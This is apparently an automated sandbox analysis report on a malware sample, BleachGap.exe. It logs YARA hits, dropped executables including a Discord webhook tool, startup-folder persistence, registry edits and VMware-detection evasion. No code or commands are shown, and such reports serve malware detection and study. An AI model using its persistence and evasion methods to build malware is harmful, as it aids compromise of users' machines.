Source: Yara match	File source: 00000006.00000002.204757687.00000220B1DF0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.242643116.0000021C508D0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.549865164.00000000025A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.208226382.000001EFEBD84000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.203003347.00000172CA3E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.214879842.00000198B6240000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.307142020.0000028CC8A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.208231540.000001EFEBDF0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.237108856.000001F5429B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.239006253.000002084EDC4000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.205843003.00000258A5660000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.211500104.000002567DA30000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.235395727.000002154B144000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.238995782.000002084EDC0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.202876581.00000172CA1D9000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.213298230.000002899B584000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.425881894.0000000002760000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.233263410.00000291A8424000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.228650813.000002264DAF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.204803949.00000220B20E4000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.224240165.00000232B7A0A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.203007148.00000172CA3E4000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.292313796.0000028CAE952000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.237124909.000001F5429B4000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.233220564.00000291A8420000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.206146430.00000258A5914000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.209894285.0000028936514000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.204817158.00000220B3700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.224208445.00000232B79E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.228739807.000002264DD60000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.224657271.00000232B7A17000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.231285225.0000021CA1E10000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.228747289.000002264DD64000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.208221509.000001EFEBD80000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.548470257.00000214BE7C1000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.224620941.00000232B79D6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.211507385.000002567DA34000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.250579104.00000000003A0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.202871401.00000172CA1D0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.250655924.0000000000A89000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.224251756.00000232B7A16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: reg.exe PID: 4064, type: MEMORY
Source: Yara match	File source: Process Memory Space: BleachGap.exe PID: 3292, type: MEMORY
Source: Yara match	File source: Process Memory Space: reg.exe PID: 3112, type: MEMORY
Source: Yara match	File source: Process Memory Space: reg.exe PID: 5936, type: MEMORY
Source: Yara match	File source: Process Memory Space: WMIC.exe PID: 912, type: MEMORY
Source: Yara match	File source: Process Memory Space: reg.exe PID: 2100, type: MEMORY
Source: Yara match	File source: Process Memory Space: reg.exe PID: 5624, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6576, type: MEMORY
Source: Yara match	File source: Process Memory Space: reg.exe PID: 4816, type: MEMORY
Source: Yara match	File source: Process Memory Space: WMIC.exe PID: 4436, type: MEMORY
Source: Yara match	File source: Process Memory Space: reg.exe PID: 6020, type: MEMORY
Source: Yara match	File source: Process Memory Space: reg.exe PID: 5472, type: MEMORY
Source: Yara match	File source: Process Memory Space: DiscordSendWebhook.exe PID: 6260, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat, type: DROPPED

Source: C:\Users\user\Desktop\BleachGap.exe

Code function: 0_2_0040A6F6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_0040A6F6

Source: BleachGap.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0xfe66f
Source: DiscordSendWebhook.exe.0.dr	Static PE information: real checksum: 0x10070f should be: 0xfcbdf
Source: DiscordSendWebhook.exe.17.dr	Static PE information: real checksum: 0x10070f should be: 0xfcbdf
Source: extd.exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x4cfac
Source: BleachGap.exe	Static PE information: real checksum: 0x0 should be: 0xfe66f
Source: extd.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4cfac

Source: BleachGap.exe	Static PE information: section name: .code
Source: BleachGap.exe.1.dr	Static PE information: section name: .code

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0014C590 push eax; retn 0014h	34_2_0014C599
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00168B85 push ecx; ret	34_2_00168B98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 37_2_00007FFAEE2D6FDC pushad ; retf	37_2_00007FFAEE2D6FDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 37_2_00007FFAEE2D6BA0 pushfd ; iretd	37_2_00007FFAEE2D6BA1

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\BleachGap.exe	File created: C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\BleachGap.exe	File created: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\extd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	File created: C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	File created: C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\extd.exe	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Jump to dropped file
Source: C:\Users\user\Desktop\BleachGap.exe	File created: C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	File created: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Jump to dropped file

Boot Survival:

Drops PE files to the startup folder

Show sources

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe

Jump to dropped file

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe

Jump to behavior

Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe\:Zone.Identifier:$DATA			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00144A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		34_2_00144A35
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001C55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		34_2_001C55FD

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001633C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

34_2_001633C7

Source: C:\Users\user\Desktop\BleachGap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\BleachGap.exe	Window / User API: threadDelayed 5986	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Window / User API: threadDelayed 3392	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6883
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1416

Source: C:\Users\user\Desktop\BleachGap.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\BleachGap.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\extd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\extd.exe	Jump to dropped file

Source: C:\Users\user\Desktop\BleachGap.exe TID: 256	Thread sleep count: 5986 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe TID: 256	Thread sleep time: -149650s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe TID: 1240	Thread sleep count: 3392 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe TID: 1240	Thread sleep time: -84800s >= -30000s	Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 2796	Thread sleep count: 139 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe TID: 6284	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624	Thread sleep count: 6883 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624	Thread sleep count: 1416 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\BleachGap.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\BleachGap.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\BleachGap.exe	Thread sleep count: Count: 5986 delay: -25			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Thread sleep count: Count: 3392 delay: -25			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001A4696 GetFileAttributesW,FindFirstFileW,FindClose,	34_2_001A4696
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001AC93C FindFirstFileW,FindClose,	34_2_001AC93C
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001AC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	34_2_001AC9C7
